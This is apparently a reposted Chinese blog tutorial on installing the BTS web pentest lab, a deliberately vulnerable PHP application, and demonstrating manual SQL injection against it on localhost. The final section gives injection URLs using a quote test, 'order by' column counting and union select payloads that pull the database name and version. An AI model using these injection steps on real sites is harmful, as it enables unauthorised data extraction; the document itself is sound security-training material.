BTS滲透測試實驗室----安裝與實戰
阿新 • • 發佈:2017-06-15
進行 url 數據庫初始 board ews 知識 views tle 數據庫
一、簡介
BTS滲透測試實驗室是一個開放源碼的脆弱的Web應用程序,創建的網絡安全和隱私的基礎(www.cysecurity.org)。它可以用來了解許多不同類型的Web應用程序漏洞。
目前,該應用程序包含以下類型的漏洞:
● SQL註入
● XSS(包括Flash XSS)
● CSRF
● 點擊劫持
● SSRF
● 文件包含
● 執行代碼
● 不安全的直接對象引用
● 不受限制的文件上傳漏洞
● 打開URL重定向
● 服務器端包含(SSI)註入
二、安裝與配置
首先下載源碼,這裏可以下載我漢化好的中文版:http://download.csdn.net/detail/u011781521/9768345 下載下來之後,解壓到集成環境中的WWW目錄,我這裏使用的是"PHPstudy"。
修改文件夾下的config.PHP配置正確的數據庫連接信息
然後訪問: http://localhost/btslab/setup.php
點擊"Setup"進行數據庫初始化,初始化之後就會進入首頁
然後點擊登錄,輸入用戶名與密碼,這裏的用戶名是admin,但是密碼他是通過sh1加過密的
所以直接輸password是登陸不進去的,如果嫌麻煩就直接改代碼或者數據庫。
三、實戰
這個平臺包含很多東西,具體的如下
先以手工註入來演示下"SQL註入1"
[html] view plain copy
- http://localhost/btslab/vulnerability/ForumPosts.php?id=1
先判斷是否存在註入,在地址後面加上一個單引號
直接報錯!然後猜解字段數 order by 4
正確說明字段數為4,然後猜解表名
[html] view plain copy
- http://localhost/btslab/vulnerability/ForumPosts.php?id=1 union select 1,2,3,4 from posts
然後猜解字段內容,把2,3,4替換成你想要猜解的字段內容名字。
[html] view plain copy
- http://localhost/btslab/vulnerability/ForumPosts.php?id=1 union select 1,database(),version(),4 from posts
BTS滲透測試實驗室----安裝與實戰